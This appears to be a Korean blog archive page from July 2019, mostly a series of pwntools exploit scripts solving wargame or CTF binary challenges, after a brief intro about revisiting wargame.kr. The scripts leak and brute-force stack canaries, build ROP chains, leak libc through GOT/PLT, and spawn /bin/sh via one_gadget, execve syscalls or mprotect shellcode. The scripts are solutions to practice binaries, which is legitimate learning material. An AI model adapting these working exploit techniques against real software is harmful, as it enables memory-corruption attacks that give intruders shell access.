'2019/07'에 해당되는 글 38건

일 년인가 만에 wargame.kr에 들어가 보니 새로운 문제가 7개 정도 추가돼있었다.

추가된 문제 중에 웹이 딱 하나 있길래 구경해봤는데 엄청 재밌게 풀다가 출근해야 되는데 거의 밤을 새버렸다.

원래 롸업 올리려고 했는데 추가된 문제라 그런가 공개된 롸업도 하나도 없고 솔버도 적은 것 같아서 나중에 롸업들 좀 풀리면 정리해둔거 올려야겠다.

exploit.py

from pwn import *

p = process("./start")

e = ELF("./start")

payload = "A"*(0x20-12)
payload += "B"*4

p.sendline(payload)
print p.recvuntil("\n")
canary = "\x00" + p.recv(7)
print p.recv()
sleep(0.2)
pop_rax_rdx_rbx = 0x47a6e6
pop_rdi = 0x4005d5
pop_rsi = 0x4017f7
pop_rdx = 0x443776
syscall = 0x4003fc
binsh = "/bin/sh\x00"

read = 0x440300

payload2 = "A"*(0x20-8)
payload2 += canary
payload2 += "C"*8

payload2 += p64(pop_rdi)
payload2 += p64(0) 
payload2 += p64(pop_rsi)
payload2 += p64(e.bss())
payload2 += p64(pop_rdx)
payload2 += p64(len(binsh))
payload2 += p64(read)

payload2 += p64(pop_rax_rdx_rbx)
payload2 += p64(59) 
payload2 += p64(0)
payload2 += p64(0)
payload2 += p64(pop_rsi)
payload2 += p64(0)
payload2 += p64(pop_rdi)
payload2 += p64(e.bss())
payload2 += p64(syscall)


p.sendline(payload2)

print p.recv()
sleep(0.2)
p.sendline("exit")
p.send(binsh)
p.interactive()

from pwn import *
  
p = process("./vuln")
e = ELF("./vuln")
l = e.libc

print p.recvuntil("\n")
p.sendline("youngsin")
for i in range(1,100):
    print p.sendlineafter("\tselect\t|\t\n","1")
    print p.sendlineafter("music\t|\t","A")
    print p.sendlineafter("\tartist\t|\t","B")

for i in range(99,101):
    print p.sendlineafter("\tselect\t|\t\n","3")
    print p.sendlineafter("select number\t|\t\n",str(i))
    print p.sendlineafter("music\t|\t","A"*19)

    if i==100:
        print p.sendafter("artist\t|\t","F"*16+"12345")
    else:
        print p.sendlineafter("artist\t|\t","B"*24)

print p.sendlineafter("\tselect\t|\t\n","2")
print p.recvuntil("12345")

canary = "\x00"+p.recv(3)
pppr = 0x080495ad
binsh = "/bin/sh\x00"

payload = "A"*20
payload += canary
payload += "A"*12

payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['read'])
payload += p32(4)

payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len(binsh))

payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)

payload += p32(e.plt['read'])
payload += "A"*4
payload += p32(e.bss())

print p.sendlineafter("\tselect\t|\t\n","3")
print p.sendlineafter("select number\t|\t\n","100")
print p.sendlineafter("music\t|\t","A"*19)
print p.sendafter("artist\t|\t",payload)
print p.sendlineafter("\tselect\t|\t\n","4")
print p.recvuntil("BYE\n\n")


read_addr = u32(p.recv(4).ljust(4,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']

p.send(binsh)
p.sendline(p32(system_addr))
p.interactive()

exploit.py

from pwn import *
  
p = process("./feedme")

e = ELF("./feedme")

canary = ""
p.recvuntil("FEED ME!\n")
for j in range(0,4):
    for i in range(0,256):
        payload = "A"*0x20+canary+chr(i)
        p.send(chr(len(payload)))
        p.send(payload)
        result = p.recvuntil("FEED ME!\n")
        if not "stack smashing detected" in result:
            canary += chr(i)
            print canary
            break

print "Find Canary = " + canary

syscall = 0x0806fa1e
par = 0x080bb496
pcpbr = 0x0806f371
pdr = 0x0806f34a
bss = e.bss()
binsh = "/bin/sh\x00"


payload = "A"*0x20
payload += canary
payload += "A"*12
payload += p32(par)
payload += p32(0x3)
payload += p32(pcpbr)
payload += p32(bss)
payload += p32(0)
payload += p32(pdr)
payload += p32(len(binsh))
payload += p32(syscall)

payload += p32(par)
payload += p32(0xb)
payload += p32(pcpbr)
payload += p32(0)
payload += p32(bss)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)


p.send(chr(len(payload)))
p.send(payload)
sleep(0.1)
p.send(binsh)
p.interactive()

exploit.py

from pwn import *
  
p = process("./vuln")

e = ELF("./vuln")
l = e.libc

pr = 0x400753
main_start = 0x4006A9
one_gadget = [0x4f2c5, 0x4f322, 0x10a38c]

payload = "A"*(0x40+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(main_start)

p.sendlineafter(">> ",payload)
p.recvuntil("!!\n")

puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + one_gadget[1]

payload2 = "A"*(0x40+8)
payload2 += p64(one_addr)
p.sendlineafter(">> ",payload2)
p.interactive()

exploit.py

from pwn import *
  
p = process('./ropbaby')
e = ELF('./ropbaby')
libc = e.libc

pop_rdi_offset = 0x000000000002155f
gets_offset = libc.symbols['gets']
one_offset = [0x4f2c5, 0x4f322, 0x10a38c]

p.sendlineafter(': ', '2')
p.sendlineafter(': ', 'gets')
gets_addr = int(p.recvline().split(' ')[2], 16)

libc_base = gets_addr - gets_offset
one_addr = libc_base + one_offset[0]

payload = 'A' * 8
payload += p64(one_addr)


p.sendlineafter(': ', '3')
p.sendlineafter(': ', str(len(payload)+1))
p.sendline(payload)

p.sendlineafter(': ', '4')
p.interactive()

mprotect_exploit.py

from pwn import *
  
p = process("./gets")

read = 0x0806D5F0
mprotect = 0x0806E0F0
pppr = 0x80bacfe
bss = 0x080eb000
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

payload = "A"*(0x18+4)
payload += p32(read)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(shellCode))

payload += p32(mprotect)
payload += p32(pppr)
payload += p32(bss)
payload += p32(len(shellCode))
payload += p32(7)

payload += p32(bss)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(shellCode)
p.interactive()

syscall_exploit.py

from pwn import *
  
p = process("./gets")

gets_plt = 0x804f120
bss = 0x080eaf80
par = 0x080b81c6
pbr = 0x080481c9
pcr = 0x080de955
pdr = 0x0806f02a
syscall = 0x0806cc25
binsh = "/bin/sh\x00"

payload = "A"*(0x18+4)
payload += p32(gets_plt)
payload += p32(par)
payload += p32(bss)
payload += p32(par)
payload += p32(0xb)
payload += p32(pbr)
payload += p32(bss)
payload += p32(pcr)
payload += p32(0)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)

p.sendlineafter("\n",payload)
sleep(0.1)
p.sendline(binsh)
p.interactive()

exploit.py

from pwn import *

canary = ""

for j in range(0,4):
    for i in range(0,256):
        p = process("./vuln")
        payload ="A"*0x20+canary+chr(i)
        print p.recvuntil("> ")
        p.sendline(str(len(payload)))
        print p.recvuntil("> ")
        p.send(payload)

        try:
            print p.recvuntil("Stack")
        except:
            canary += chr(i)
            break
        p.close()


print "Found Canary = " + canary

p = process("./vuln")
print p.recvuntil("> ")

win = 0x080486EB
payload = "A"*0x20
payload += canary
payload += "A"*(0xC+4)
payload += p32(win)

p.sendline(str(len(payload)))

print p.recvuntil("> ")
p.send(payload)
print p.recv(2048)

exploit.py

from pwn import *

p = process("./baskin")

write_plt = 0x4006d0
pppr = 0x40087a
read_plt = 0x400700
read_got = 0x602040
bss = 0x0000000000602090
distance = 0x7f01512ac070 - 0x7f01511eb440
binsh="/bin/sh\x00"

payload = "A"*(0xb0+8)
payload += p64(pppr)
payload += p64(1)
payload += p64(read_got)
payload += p64(8)
payload += p64(write_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(bss)
payload += p64(len(binsh))
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(0)
payload += p64(read_got)
payload += p64(8)
payload += p64(read_plt)

payload += p64(pppr)
payload += p64(bss)
payload += "A"*16
payload += p64(read_plt)

print p.recvuntil("(1-3)\n")

p.sendline(payload)
print p.recvuntil("Don't break the rules...:( \n")

read = u64(p.recv(8))
system = p64(read-distance)
p.send(binsh)
sleep(0.5)
p.sendline(system)
p.interactive()